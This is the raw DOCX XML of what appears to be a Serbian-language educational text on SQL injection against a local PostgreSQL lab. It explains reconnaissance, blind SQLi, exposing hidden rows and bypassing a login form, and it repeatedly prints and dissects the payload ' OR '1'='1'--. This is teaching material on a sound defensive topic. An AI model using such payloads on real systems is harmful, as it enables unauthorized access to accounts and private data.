    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>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Oznaka za komentare ( </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itd. u zavisnosti od tipa baze podataka),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>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Ključne reči poput </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</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77">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8">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Kod nekih tipova ranjivosti, konkretno </w:t>
      </w:r>
      <w:hyperlink w:anchor="_cwiw5uwznxms">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Blind SQLi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, aplikacija ne vraća grešku, ali se mogu primetiti promene u ponašanju aplikacije (spor odgovor, promena sadržaja stranice), što omogućava otkrivanje ranjivosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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A">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 toku faze izviđanja je takođe moguće koristiti alate koji automatski pronalaze moguća polja za eksploataciju i olakšavaju testiranje, kao što su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:customMarkFollows="0" w:id="0"/>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 Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:customMarkFollows="0" w:id="1"/>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7B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9a1yeb93lh72" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Napadi na logiku upita i čitanje podataka</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 okviru ovog poglavlja će biti reči o osnovnim pristupima izvršavanja SQL Injection napada nad PostgreSQL bazom podataka u okviru lokalnog okruženja. Zatim će biti prikazani napadi koji za cilj imaju otkrivanje podataka, uključujući i načine na koje je moguće pronaći potencijalne ranjivosti. Zatim će biti predstavljeni napadi kojima je cilj zaobilaženje upita, otkrivanje podataka iz drugih tabela u okviru sistema, kao i posebna kategorija, tzv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">napadi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d9y9m9ltqlei" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1 Otkrivanje skrivenih podataka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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Kada je cilj otkriti skrivene podatke iz baze podataka, najčešće se payload umeće u okviru </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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klauzule, kako bi se ili promenila logika postojećeg uslova ili dodao sasvim novi uslov.</w:t>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bismo imali tabelu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">profiles </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">koja sadrži informacije o korisničkim nalozima, kao i upit koji vraća podatke o nalozima na osnovu uloge (atribut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), pod uslovom da korisnički profil nije privatan (atribut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">private = False</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), očekivano ponašanje je opisano slikom 1:</w:t>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6913" cy="768403"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34"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76913" cy="76840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1 - Regularno ponašanje aplikacije</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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slučaju, unos ,,user’’ je, bez ikakvog filtriranja, ubačen u upit i prikazan je rezultat koji zadovoljava oba kriterijuma: korisnik čija je uloga ,,user’’ i čiji nalog nije privatan. </w:t>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se sumnja na SQLi ranjivost, prvi korak bi bio umetanje SQL-specifičnih karaktera i ključnih reči, kao što je apostrof (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Cilj je videti uticaj ručno unetog karaktera za prekidanje stringa, vidljivo na slici 2:</w:t>
      </w:r>
    </w:p>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7300" cy="750711"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29"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067300" cy="75071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2 - Umetanje apostrofa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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Zahvaljujući jasnoj SQL poruci o prirodi greške, primećuje se da je korisnički unet apostrof, na slici naznačen crvenom strelicom, doveo do neadekvatnog procesiranja samog upita. S obzirom da se u upitu nalaze tri apostrofa zaredom, SQL parser smatra da neki string nije terminiran, što dovodi do greške u izvršavanju upita.</w:t>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 druge strane, ovo govori da logika aplikacije nema zadovoljavajući filter za korisnički unos, što otvara mogućnost za eksploatacijom. Konkretno, u ovom slučaju će cilj biti prikazivanje svih korisničkih naloga, nezavisno od njihove uloge u sistemu, kao ni privatnosti samih naloga. Primer ovakvog payload-a se može videti na slici 3:</w:t>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6863" cy="1474903"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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376863" cy="147490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3 - Umetanje OR operatora i novog uslova</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Iskorišćen payload je </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1'--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a njegova pozicija u upitu je označena crvenim pravougaonikom na prethodnoj slici. Njegovu logiku možemo podeliti na tri segmenta:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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prvi apostrof </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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uslov </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR '1'='1'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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oznaka za početak komentara </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w: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Prvi apostrof služi za terminaciju stringa koji označava korisničku ulogu - u</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE role = ''</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> delu upita. Izostavljanje ovog apostrofa bi dovelo do greške u upitu.</w:t>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Uslov </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR '1'='1'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> zaobilazi prvi uslov </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> klauzule, u ovom slučaju filtriranje po ulozi. S obzirom da će biti protumačeno traženje korisnika čije su uloge prazan string (što bi samo po sebi dovelo do greške), dat je </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uslov koji je uvek tačan: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR '1'='1'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> , gde je efekat zaobilaženje celokupnog uslova koji se odnosi na korisničke uloge.</w:t>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kraju, oznaka za početak komentara </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dovodi do ignorisanja ostatka upita, konkretno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dela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klauzule, koja se odnosi vraćanje samo javnih korisničkih naloga.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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se pogleda celina izvršenog upita, u potpuni su zaobiđeni pravi uslovi filtriranja iz originalnog upita, što čini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klauzulu redundantnom. Efekat se svodi preuzimanje svih redova iz tabele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">profiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, vidljivo u rezultatima upita gde postoje i nalozi koji su privatni i javni, kao i sve moguće korisničke uloge (administrator, moderator i korisnik).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Style w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u1ignls53jz5" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2 Zaobilazaženje logike upita - Autentifikacija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Jedan od najčešćih primera SQLi napada jesu kod neadekvatno implementiranih formi za autentifikaciju korisnika. Cilj ovakvog napada je zaobilaženje logike upita, gde se omogućuje prijava korisnika samo na osnovu korisničkog imena ili email adrese, bez potrebe da lozinka bude poznata.</w:t>
      </w:r>
    </w:p>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nastavku će biti obrađen primer koji će iskoristiti identičan payload iz prethodnog poglavlja,  </w:t>
      </w:r>
      <w:hyperlink w:anchor="_d9y9m9ltqlei">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.2.1 Otkrivanje skrivenih podataka</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a zatim će on biti unapređen.</w:t>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Očekivano ponašanje autentifikacije je vidljiv na slici 4:</w:t>
      </w:r>
    </w:p>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3563" cy="1049124"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28"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643563" cy="104912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4 - Regularno ponašanje pri prijavi korisnika</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">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Korisnički unos, tj. korisničko ime i lozinka, je direktno umetnut u upit, gde je rezultat uspešna prijava zbog poklapanja poslatih parametara sa onima koji se nalaze u bazi podataka.</w:t>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obzirom da je napadaču cilj zaobići nepoznat parametar, lozinku, moguće je iskoristiti prethodno definisan upit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1'--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> umesto korisničkog imena, vidljivo na slici 5:</w:t>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6888" cy="920544"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25"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576888" cy="92054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5 - Zaobilaženje logike autentifikacije</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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slučaju, deo upita koji se odnosi na lozinku će biti zakomentarisan, dok će unutar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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klauzule prosleđen payload uvek biti evaluiran kao tačan, što će činiti deo za korisničko ime i samu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klauzulu redundantnim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Treba napomenuti da je rezultat izvršenja upita vraćen administratorski nalog iz dva razloga:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Bez obzira na </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
